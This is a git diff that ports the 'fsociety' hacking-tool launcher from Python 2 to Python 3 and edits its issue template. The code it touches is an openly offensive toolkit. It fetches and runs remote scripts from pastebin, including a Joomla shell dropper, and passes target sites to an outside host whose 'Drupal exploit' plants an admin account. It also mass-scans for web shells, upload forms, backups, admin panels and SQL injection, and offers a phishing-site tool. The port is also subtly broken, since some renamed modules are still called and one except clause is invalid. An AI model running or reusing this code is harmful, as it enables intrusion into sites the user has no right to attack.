diff --git a/ISSUE_TEMPLATE.md b/ISSUE_TEMPLATE.md index 5228ad7..d589af6 100644 --- a/ISSUE_TEMPLATE.md +++ b/ISSUE_TEMPLATE.md @@ -1,18 +1,31 @@ ## Checkboxes -- [ ] Updated fsociety +- [X] Updated fsociety - [ ] Issue does not already exist -- [ ] fsociety issue, not a tool issue +- [X] fsociety issue, not a tool issue + +--Updated Fsociety imports with new ones + +--Line 184/185 in fsociety.py has an issue : ## Expected Result ```bash - + elif choice == "99": + with open(configFile, 'wb') as configfile: + config.write(configfile) + sys.exit() ``` - +Should be writing to the config file ## Actual Result +Throws this error in console : +```bash +TypeError: a bytes-like object is required, not 'str' +``` +Quick fix : ```bash + elif choice == "99": + sys.exit() ``` - diff --git a/docs/fonts/MR ROBOT.ttf b/docs/fonts/MR ROBOT.ttf old mode 100755 new mode 100644 diff --git a/fsociety.cfg b/fsociety.cfg index 5c08834..3de31cc 100644 --- a/fsociety.cfg +++ b/fsociety.cfg @@ -2,4 +2,4 @@ agreement = false toolDir = tools/ logDir = logs/ -yes = yes y ye ya yep yeah yee yeperoo not-no +yes = yes y ye ya yep yeah yee yeperoo not-no \ No newline at end of file diff --git a/fsociety.py b/fsociety.py index 56f6573..891125a 100644 --- a/fsociety.py +++ b/fsociety.py @@ -20,10 +20,10 @@ import sys import argparse import os -import httplib +import httplib2 import subprocess import re -import urllib2 +import urllib3 import socket import urllib import sys @@ -31,16 +31,15 @@ import telnetlib import glob import random -import Queue +import queue import threading import base64 import time -import ConfigParser +import configparser from sys import argv -from commands import * from getpass import getpass from xml.dom import minidom -from urlparse import urlparse +import urlparse2 from optparse import OptionParser from time import gmtime, strftime, sleep @@ -67,16 +66,16 @@ def clearScr(): def yesOrNo(): - return (raw_input("Continue Y / N: ") in yes) + return (input("Continue Y / N: ") in yes) ''' Config ''' installDir = os.path.dirname(os.path.abspath(__file__)) + '/' -configFile = installDir + "/fsociety.cfg" +configFile = installDir + "./fsociety.cfg" print(installDir) -config = ConfigParser.RawConfigParser() +config = configparser.RawConfigParser() config.read(configFile) toolDir = installDir + config.get('fsociety', 'toolDir') @@ -135,7 +134,7 @@ def agreement(): clearScr() print(termsAndConditions) print(mrrobot4) - agree = raw_input("You must agree to our terms and conditions first (Y/n) ").lower() + agree = input("You must agree to our terms and conditions first (Y/n) ").lower() if agree in yes: config.set('fsociety', 'agreement', 'true') @@ -159,7 +158,7 @@ def __init__(self): {11}-CONTRIBUTORS {99}-EXIT\n ''') - choice = raw_input(fsocietyPrompt) + choice = input(fsocietyPrompt) clearScr() if choice == "1": informationGatheringMenu() @@ -182,8 +181,6 @@ def __init__(self): elif choice == "11": self.githubContributors() elif choice == "99": - with open(configFile, 'wb') as configfile: - config.write(configfile) sys.exit() elif choice == "\r" or choice == "\n" or choice == "" or choice == " ": self.__init__() @@ -215,7 +212,7 @@ def createFolders(self): os.makedirs(logDir) def completed(self): - raw_input("Completed, click return to go back") + input("Completed, click return to go back") self.__init__() def update(self): @@ -242,7 +239,7 @@ def __init__(self): " {3}--pyPISHER - Tool to create a mallicious website for password pishing") print(" {4}--SMTP Mailer - Tool to send SMTP mail\n ") print(" {99}-Back To Main Menu \n") - choice6 = raw_input(fsocietyPrompt) + choice6 = input(fsocietyPrompt) clearScr() if choice6 == "1": setoolkit() @@ -259,7 +256,7 @@ def __init__(self): self.completed() def completed(self): - raw_input("Completed, click return to go back") + input("Completed, click return to go back") self.__init__() @@ -288,7 +285,7 @@ def __init__(self): " {11}-BruteX - Automatically brute force all services running on a target") print(" {12}-Arachni - Web Application Security Scanner Framework \n ") print(" {99}-Back To Main Menu \n") - choiceweb = raw_input(fsocietyPrompt) + choiceweb = input(fsocietyPrompt) clearScr() if choiceweb == "1": maine() @@ -321,7 +318,7 @@ def __init__(self): self.completed() def completed(self): - raw_input("Completed, click return to go back") + input("Completed, click return to go back") self.__init__() @@ -336,12 +333,12 @@ class privateWebHacking: def __init__(self): clearScr() print(self.menuLogo) - target = raw_input("Enter Target IP: ") + target = input("Enter Target IP: ") Fscan(target) self.completed() def completed(self): - raw_input("Completed, click return to go back") + input("Completed, click return to go back") self.__init__() @@ -360,7 +357,7 @@ def __init__(self): print(" {2}--POET") print(" {3}--Phishing Framework \n") print(" {99}-Return to main menu \n ") - choice11 = raw_input(fsocietyPrompt) + choice11 = input(fsocietyPrompt) clearScr() if choice11 == "1": sitechecker() @@ -375,7 +372,7 @@ def __init__(self): self.completed() def completed(self): - raw_input("Completed, click return to go back") + input("Completed, click return to go back") self.__init__() @@ -405,7 +402,7 @@ def __init__(self): print(" {7}--Doork") print(" {8}--Crips\n ") print(" {99}-Back To Main Menu \n") - choice2 = raw_input(fsocietyPrompt) + choice2 = input(fsocietyPrompt) clearScr() if choice2 == "1": nmap() @@ -430,7 +427,7 @@ def __init__(self): self.completed() def completed(self): - raw_input("Completed, click return to go back") + input("Completed, click return to go back") self.__init__() @@ -466,7 +463,7 @@ def install(self): def run(self): clearScr() print(self.nmapLogo) - target = raw_input(self.targetPrompt) + target = input(self.targetPrompt) self.menu(target) def menu(self, target): @@ -477,19 +474,19 @@ def menu(self, target): print(" {2}--Port Scan [-Pn]") print(" {3}--Operating System Detection [-A]\n") print(" {99}-Return to information gathering menu \n") - response = raw_input("nmap ~# ") + response = input("nmap ~# ") clearScr() logPath = "logs/nmap-" + strftime("%Y-%m-%d_%H:%M:%S", gmtime()) try: if response == "1": os.system("nmap -sV -oN %s %s" % (logPath, target)) - response = raw_input(continuePrompt) + response = input(continuePrompt) elif response == "2": os.system("nmap -Pn -oN %s %s" % (logPath, target)) - response = raw_input(continuePrompt) + response = input(continuePrompt) elif response == "3": os.system("nmap -A -oN %s %s" % (logPath, target)) - response = raw_input(continuePrompt) + response = input(continuePrompt) elif response == "99": pass else: @@ -509,7 +506,7 @@ def __init__(self): else: print(alreadyInstalled) self.run() - response = raw_input(continuePrompt) + response = input(continuePrompt) def installed(self): return (os.path.isfile("/usr/bin/setoolkit")) @@ -536,10 +533,10 @@ class host2ip: def __init__(self): clearScr() print(self.host2ipLogo) - host = raw_input(" Enter a Host: ") + host = input(" Enter a Host: ") ip = socket.gethostbyname(host) print(" %s has the IP of %s" % (host, ip)) - response = raw_input(continuePrompt) + response = input(continuePrompt) class wpscan: @@ -558,7 +555,7 @@ def __init__(self): self.install() clearScr() print(self.wpscanLogo) - target = raw_input(" Enter a Target: ") + target = input(" Enter a Target: ") self.menu(target) def installed(self): @@ -576,7 +573,7 @@ def menu(self, target): print(" {2}--Plugin Enumeration [--enumerate p]") print(" {3}--All Enumeration Tools [--enumerate]\n") print(" {99}-Return to information gathering menu \n") - response = raw_input("wpscan ~# ") + response = input("wpscan ~# ") clearScr() logPath = "../../logs/wpscan-" + \ strftime("%Y-%m-%d_%H:%M:%S", gmtime()) + ".txt" @@ -585,15 +582,15 @@ def menu(self, target): if response == "1": os.system( "ruby tools/wpscan/wpscan.rb %s --enumerate u --log %s" % (wpscanOptions, logPath)) - response = raw_input(continuePrompt) + response = input(continuePrompt) elif response == "2": os.system( "ruby tools/wpscan/wpscan.rb %s --enumerate p --log %s" % (wpscanOptions, logPath)) - response = raw_input(continuePrompt) + response = input(continuePrompt) elif response == "3": os.system( "ruby tools/wpscan/wpscan.rb %s --enumerate --log %s" % (wpscanOptions, logPath)) - response = raw_input(continuePrompt) + response = input(continuePrompt) elif response == "99": pass else: @@ -618,9 +615,9 @@ def __init__(self): self.install() clearScr() print(self.CMSmapLogo) - target = raw_input(" Enter a Target: ") + target = input(" Enter a Target: ") self.run(target) - response = raw_input(continuePrompt) + response = input(continuePrompt) def installed(self): return (os.path.isdir(self.installDir)) @@ -656,7 +653,7 @@ def __init__(self): clearScr() print(self.XSStrikeLogo) self.run() - response = raw_input(continuePrompt) + response = input(continuePrompt) def installed(self): return (os.path.isdir(self.installDir)) @@ -686,9 +683,9 @@ def __init__(self): self.install() clearScr() print(self.doorkLogo) - target = raw_input(" Enter a Target: ") + target = input(" Enter a Target: ") self.run(target) - response = raw_input(continuePrompt) + response = input(continuePrompt) def installed(self): return (os.path.isdir(self.installDir)) @@ -763,7 +760,7 @@ def __init__(self): print( " {2}--BruteX - Automatically bruteforces all services running on a target\n") print(" {99}-Back To Main Menu \n") - choice3 = raw_input("passwd ~# ") + choice3 = input("passwd ~# ") clearScr() if choice3 == "1": cupp() @@ -776,7 +773,7 @@ def __init__(self): self.completed() def completed(self): - raw_input("Completed, click return to go back") + input("Completed, click return to go back") self.__init__() @@ -829,7 +826,7 @@ def __init__(self): print(" {2}--pixiewps") print(" {3}--Bluetooth Honeypot GUI Framework \n") print(" {99}-Back To The Main Menu \n") - choice4 = raw_input(fsocietyPrompt) + choice4 = input(fsocietyPrompt) clearScr() if choice4 == "1": reaver() @@ -844,7 +841,7 @@ def __init__(self): self.completed() def completed(self): - raw_input("Completed, click return to go back") + input("Completed, click return to go back") self.__init__() @@ -947,7 +944,7 @@ def __init__(self): print(" {8}--Bruteforce the Android Passcode given the hash and salt") print(" {9}--Joomla SQL injection Scanner \n ") print(" {99}-Go Back To Main Menu \n") - choice5 = raw_input(fsocietyPrompt) + choice5 = input(fsocietyPrompt) clearScr() if choice5 == "1": atscan() @@ -974,7 +971,7 @@ def __init__(self): self.completed() def completed(self): - raw_input("Completed, click return to go back") + input("Completed, click return to go back") self.__init__() @@ -999,7 +996,7 @@ def install(self): os.system("cd %s && chmod +x install.sh && ./install.sh" % self.installDir) def run(self): - target = raw_input("Enter Target IP: ") + target = input("Enter Target IP: ") os.system("brutex %s" % target) @@ -1024,7 +1021,7 @@ def install(self): "gem install bundler && bundle install --without prof && rake install") def run(self): - target = raw_input("Enter Target Hostname: ") + target = input("Enter Target Hostname: ") os.system("arachni %s --output-debug 2> %sarachni/%s.log" % (target, logDir, strftime("%Y-%m-%d_%H:%M:%S", gmtime()))) @@ -1045,7 +1042,7 @@ def gabriel(): os.system("wget http://pastebin.com/raw/Szg20yUh --output-document=gabriel.py") clearScr() os.system("python gabriel.py") - ftpbypass = raw_input("Enter Target IP and Use Command:") + ftpbypass = input("Enter Target IP and Use Command:") os.system("python gabriel.py %s" % ftpbypass) @@ -1058,7 +1055,7 @@ def sitechecker(): def ifinurl(): print(''' This Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found.''') print('Do You Want To Install InurlBR ? ') - cinurl = raw_input("Y/N: ") + cinurl = input("Y/N: ") if cinurl in yes: inurl() else: @@ -1068,7 +1065,7 @@ def ifinurl(): def bsqlbf(): clearScr() print("This tool will only work on blind sql injection") - cbsq = raw_input("select target: ") + cbsq = input("select target: ") os.system("wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl") os.system("perl bsqlbf.pl -url %s" % cbsq) os.system("rm bsqlbf.pl") @@ -1106,13 +1103,13 @@ def joomlarce(): os.system("wget http://pastebin.com/raw/EX7Gcbxk --output-document=temp.py") clearScr() print("if the response is 200 , you will find your shell in Joomla_3.5_Shell.txt") - jmtarget = raw_input("Select a targets list:") + jmtarget = input("Select a targets list:") os.system("python temp.py %s" % jmtarget) def inurl(): - dork = raw_input("select a Dork:") - output = raw_input("select a file to save:") + dork = input("select a Dork:") + output = input("select a file to save:") os.system( "./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output)) webHackingMenu.completed("InurlBR") @@ -1145,8 +1142,8 @@ def jboss(): def wppluginscan(): Notfound = [404, 401, 400, 403, 406, 301] - sitesfile = raw_input("sites file: ") - filepath = raw_input("Plugins File: ") + sitesfile = input("sites file: ") + filepath = input("Plugins File: ") def scan(site, dir): global resp @@ -1191,9 +1188,9 @@ def grabuploadedlink(url): for dir in directories: currentcode = urllib.urlopen(url + dir).getcode() if currentcode == 200 or currentcode == 403: - print "-------------------------" - print " [ + ] Found Directory: " + str(url + dir) + " [ + ]" - print "-------------------------" + print ("-------------------------") + print (" [ + ] Found Directory: " + str(url + dir) + " [ + ]") + print ("-------------------------") upload.append(url + dir) except: pass @@ -1205,17 +1202,17 @@ def grabshell(url): for shell in shells: currentcode = urllib.urlopen(upl + shell).getcode() if currentcode == 200: - print "-------------------------" - print " [ ! ] Found Shell: " + \ - str(upl + shell) + " [ ! ]" - print "-------------------------" + print ("-------------------------") + print (" [ ! ] Found Shell: " + \ + str(upl + shell) + " [ ! ]") + print ("-------------------------") except: pass def shelltarget(): print("Exemple: http://target.com") - line = raw_input("target: ") + line = input("target: ") line = line.rstrip() grabuploadedlink(line) grabshell(line) @@ -1290,11 +1287,11 @@ def check_gravityforms(sites): def gravity(): - ip = raw_input('Enter IP: ') + ip = input('Enter IP: ') sites = bing_all_grabber(str(ip)) gravityforms = check_gravityforms(sites) for ss in gravityforms: - print ss + print (ss) print('\n') print('[*] Found, ', len(gravityforms), ' gravityforms.') @@ -1311,8 +1308,8 @@ def shellnoob(): def androidhash(): - key = raw_input("Enter the android hash: ") - salt = raw_input("Enter the android salt: ") + key = input("Enter the android hash: ") + salt = input("Enter the android salt: ") os.system( "git clone --depth=1 https://github.com/PentesterES/AndroidPINCrack.git") os.system( @@ -1321,7 +1318,7 @@ def androidhash(): def cmsfew(): print("your target must be Joomla, Mambo, PHP-Nuke, and XOOPS Only ") - target = raw_input("Select a target: ") + target = input("Select a target: ") os.system( "wget https://dl.packetstormsecurity.net/UNIX/scanners/cms_few.py.txt -O cms.py") os.system("python cms.py %s" % target) @@ -1370,9 +1367,9 @@ class Fscan: def __init__(self, serverip): self.serverip = serverip self.getSites(False) - print menuu + print (menuu) while True: - choice = raw_input(fsocietyPrompt) + choice = input(fsocietyPrompt) if choice == '1': self.getSites(True) elif choice == '2': @@ -1390,7 +1387,7 @@ def __init__(self, serverip): elif choice == '8': self.grabSqli() elif choice == '9': - ran = raw_input(' Enter range of ports, (ex: 1-1000) -> ') + ran = input(' Enter range of ports, (ex: 1-1000) -> ') self.portScanner(1, ran) elif choice == '10': self.portScanner(2, None) @@ -1400,12 +1397,12 @@ def __init__(self, serverip): self.cloudflareBypasser() elif choice == '99': fsociety() - con = raw_input(' Continue [Y/n] -> ') + con = input(' Continue [Y/n] -> ') if con[0].upper() == 'N': exit() else: clearScr() - print menuu + print (menuu) def getSites(self, a): ''' @@ -1439,7 +1436,7 @@ def getSites(self, a): clearScr() print('[*] Found ', len(lista), ' Website\n') for site in self.sites: - print site + print (site) def getWordpress(self): ''' @@ -1468,7 +1465,7 @@ def getWordpress(self): clearScr() print('[*] Found ', len(lista), ' Wordpress Website\n') for site in lista: - print site + print (site) def getJoomla(self): ''' @@ -1493,7 +1490,7 @@ def getJoomla(self): clearScr() print('[*] Found ' + len(lista) + ' Joomla Website\n') for site in lista: - print site + print (site) ############################ # find admin panels @@ -1503,7 +1500,7 @@ def findPanels(self): the attacker may do a lot of vulnerability tests on the admin area ''' - print "[~] Finding admin panels" + print ("[~] Finding admin panels") adminList = ['admin/', 'site/admin', 'admin.php/', 'up/admin/', 'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/', 'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/', 'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/', 'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/', 'administrator/', 'administrator.php/', 'joomla/administrator/', 'jm/administrator/', 'site/administrator/', 'install/', 'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/', 'login.php', 'site/login', 'site/login.php', 'up/login/', 'up/login.php', 'cp.php', 'up/cp', 'cp', 'master', 'adm', 'member', 'control', 'webmaster', 'myadmin', 'admin_cp', 'admin_site'] clearScr() @@ -1511,7 +1508,7 @@ def findPanels(self): for admin in adminList: try: if urllib.urlopen(site + admin).getcode() == 200: - print " [*] Found admin panel -> ", site + admin + print (" [*] Found admin panel -> ", site + admin) except IOError: pass ############################ @@ -1525,12 +1522,12 @@ def findZip(self): zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar'] clearScr() - print "[~] Finding zip file" + print ("[~] Finding zip file") for site in self.sites: for zip1 in zipList: try: if urllib.urlopen(site + zip1).getcode() == 200: - print " [*] Found zip file -> ", site + zip1 + print (" [*] Found zip file -> ", site + zip1) except IOError: pass @@ -1543,7 +1540,7 @@ def findUp(self): upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php', 'blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php'] clearScr() - print "[~] Finding Upload" + print ("[~] Finding Upload") for site in self.sites: for up in upList: try: @@ -1551,7 +1548,7 @@ def findUp(self): html = urllib.urlopen(site + up).readlines() for line in html: if re.findall('type=file', line): - print " [*] Found upload -> ", site + up + print (" [*] Found upload -> ", site + up) except IOError: pass @@ -1564,7 +1561,7 @@ def getUsers(self): (you can use medusa or hydra) ''' clearScr() - print "[~] Grabbing Users" + print ("[~] Grabbing Users") userslist = [] for site1 in self.sites: try: @@ -1579,11 +1576,11 @@ def getUsers(self): resp = urllib2.urlopen( site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read() if 'invalid username' not in resp.lower(): - print '\t [*] Found -> ', site + print ('\t [*] Found -> ', site) userslist.append(site) break else: - print site + print (site) site = site[:-1] except: @@ -1591,7 +1588,7 @@ def getUsers(self): clearScr() for user in userslist: - print user + print (user) def cloudflareBypasser(self): ''' @@ -1600,7 +1597,7 @@ def cloudflareBypasser(self): method from a guy in madleets ''' clearScr() - print "[~] Bypassing cloudflare" + print ("[~] Bypassing cloudflare") subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel'] for site in self.sites: site.replace('http://', '') @@ -1611,11 +1608,11 @@ def cloudflareBypasser(self): pass for sub in subdoms: doo = sub + '.' + site - print ' [~] Trying -> ', doo + print (' [~] Trying -> ', doo) try: ddd = socket.gethostbyname(doo) if ddd != ip: - print ' [*] Cloudflare bypassed -> ', ddd + print (' [*] Cloudflare bypassed -> ', ddd) break except socket.error: pass @@ -1630,8 +1627,8 @@ def getServerBanner(self): try: s = 'http://' + self.serverip httpresponse = urllib.urlopen(s) - print ' [*] Server header -> ', httpresponse.headers.getheader( - 'server') + print (' [*] Server header -> ', httpresponse.headers.getheader( + 'server')) except: print('[*] Server header -> Not Found') @@ -1667,7 +1664,7 @@ def checkSqli(self, s): tool in my blog ''' clearScr() - print "[~] Checking SQL injection" + print ("[~] Checking SQL injection") payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"] check = re.compile( @@ -1682,7 +1679,7 @@ def checkSqli(self, s): for line in html: checker = re.findall(check, line) if len(checker) != 0: - print ' [*] SQLi found -> ', power + print (' [*] SQLi found -> ', power) except: pass @@ -1693,7 +1690,7 @@ def portScanner(self, mode, ran): or with common ports (al-swisre idea) ''' clearScr() - print "[~] Scanning Ports" + print ("[~] Scanning Ports") if mode == 1: a = ran.split('-') @@ -1711,7 +1708,7 @@ def do_it(ip, port): sock = sock.connect_ex((ip, port)) if sock == 0: - print " [*] Port %i is open" % port + print (" [*] Port %i is open" % port) ############################ @@ -1725,7 +1722,7 @@ def do_it(ip, port): def drupal(): '''Drupal Exploit Binger All Websites Of server ''' - ip = raw_input('1- IP: ') + ip = input('1- IP: ') page = 1 while page <= 50: @@ -1744,29 +1741,29 @@ def drupal(): urlpa = urlparse(url) site = urlpa.netloc - print "[+] Testing At " + site + print ("[+] Testing At " + site) resp = urllib2.urlopen( 'http://crig-alda.ro/wp-admin/css/index2.php?url=' + site + '&submit=submit') read = resp.read() if "User: HolaKo" in read: - print "Exploit found =>" + site + print ("Exploit found =>" + site) - print "user:HolaKo\npass:admin" + print ("user:HolaKo\npass:admin") a = open('up.txt', 'a') a.write(site + '\n') a.write("user:" + user + "\npass:" + pwd + "\n") else: - print "[-] Expl Not Found:( " + print ("[-] Expl Not Found:( ") except Exception as ex: - print ex + print (ex) sys.exit(0) # Drupal Server ExtraCtor def getdrupal(): - ip = raw_input('Enter The Ip: ') + ip = input('Enter The Ip: ') page = 1 sites = list() while page <= 50: @@ -1783,14 +1780,14 @@ def getdrupal(): split = urlparse(url) site = split.netloc if site not in sites: - print site + print (site) sites.append(site) # Drupal Mass List Exploiter def drupallist(): - listop = raw_input("Enter The list Txt: ") + listop = input("Enter The list Txt: ") fileopen = open(listop, 'r') content = fileopen.readlines() for i in content: @@ -1800,22 +1797,22 @@ def drupallist(): 'http://crig-alda.ro/wp-admin/css/index2.php?url=' + url + '&submit=submit') readcontent = openurl.read() if "Success" in readcontent: - print "[+]Success =>" + url - print "[-]username:HolaKo\n[-]password:admin" + print ("[+]Success =>" + url) + print ("[-]username:HolaKo\n[-]password:admin") save = open('drupal.txt', 'a') save.write( url + "\n" + "[-]username:HolaKo\n[-]password:admin\n") else: - print i + "=> exploit not found " + print (i + "=> exploit not found ") except Exception as ex: - print ex + print (ex) def maine(): - print minu - choose = raw_input("choose a number: ") + print (minu) + choose = input("choose a number: ") while True: if choose == "1": @@ -1891,20 +1888,20 @@ def check_joomla(sites): def wppjmla(): - ipp = raw_input('Enter Target IP: ') + ipp = input('Enter Target IP: ') sites = bing_all_grabber(str(ipp)) wordpress = check_wordpress(sites) joomla = check_joomla(sites) for ss in wordpress: - print ss - print '[+] Found ! ', len(wordpress), ' Wordpress Websites' - print '-' * 30 + '\n' + print (ss) + print ('[+] Found ! ', len(wordpress), ' Wordpress Websites') + print ('-' * 30 + '\n') for ss in joomla: - print ss + print (ss) - print '[+] Found ! ', len(joomla), ' Joomla Websites' + print ('[+] Found ! ', len(joomla), ' Joomla Websites') - print '\n' + print ('\n') # initialise the fscan function ############################ @@ -1912,8 +1909,8 @@ def wppjmla(): def grabsqli(ip): try: - print color.OKBLUE + "Check_Uplaod... " - print '\n' + print (color.OKBLUE + "Check_Uplaod... ") + print ('\n') page = 1 while page <= 21: @@ -1927,7 +1924,7 @@ def grabsqli(ip): try: response = urllib2.urlopen(i).read() checksqli(i) - except urllib2.HTTPError, e: + except (urllib2.HTTPError, e): str(sites).strip(i) page = page + 10 @@ -1943,7 +1940,7 @@ def checksqli(sqli): def sqlscan(): - ip = raw_input('Enter IP -> ') + ip = input('Enter IP -> ') grabsqli(ip) @@ -2053,7 +2050,7 @@ def check_wpsymposium(sites): def wpminiscanner(): - ip = raw_input('Enter IP: ') + ip = input('Enter IP: ') sites = bing_all_grabber(str(ip)) wordpress = check_wordpress(sites) wpstorethemeremotefileupload = check_wpstorethemeremotefileupload(sites) @@ -2062,32 +2059,32 @@ def wpminiscanner(): wpeasyupload = check_wpeasyupload(sites) wpsymposium = check_wpsymposium(sites) for ss in wordpress: - print ss - print '[*] Found, ', len(wordpress), ' wordpress sites.' - print '-' * 30 + '\n' + print (ss) + print ('[*] Found, ', len(wordpress), ' wordpress sites.') + print ('-' * 30 + '\n') for ss in wpstorethemeremotefileupload: - print ss - print '[*] Found, ', len( - wpstorethemeremotefileupload), ' wp_storethemeremotefileupload exploit.' - print '-' * 30 + '\n' + print (ss) + print ('[*] Found, ', len( + wpstorethemeremotefileupload), ' wp_storethemeremotefileupload exploit.') + print ('-' * 30 + '\n') for ss in wpcontactcreativeform: - print ss - print '[*] Found, ', len(wpcontactcreativeform), ' wp_contactcreativeform exploit.' - print '-' * 30 + '\n' + print (ss) + print ('[*] Found, ', len(wpcontactcreativeform), ' wp_contactcreativeform exploit.') + print ('-' * 30 + '\n') for ss in wplazyseoplugin: - print ss - print '[*] Found, ', len(wplazyseoplugin), ' wp_lazyseoplugin exploit.' - print '-' * 30 + '\n' + print (ss) + print ('[*] Found, ', len(wplazyseoplugin), ' wp_lazyseoplugin exploit.') + print ('-' * 30 + '\n') for ss in wpeasyupload: - print ss - print '[*] Found, ', len(wpeasyupload), ' wp_easyupload exploit.' - print '-' * 30 + '\n' + print (ss) + print ('[*] Found, ', len(wpeasyupload), ' wp_easyupload exploit.') + print ('-' * 30 + '\n') for ss in wpsymposium: - print ss + print (ss) - print '[*] Found, ', len(wpsymposium), ' wp_sympsiup exploit.' + print ('[*] Found, ', len(wpsymposium), ' wp_sympsiup exploit.') - print '\n' + print ('\n') ############################ diff --git a/install.sh b/install.sh old mode 100755 new mode 100644 diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000..0957bee --- /dev/null +++ b/requirements.txt @@ -0,0 +1,5 @@ +argparse +httplib2 +urllib3 +configparser +urlparse2 \ No newline at end of file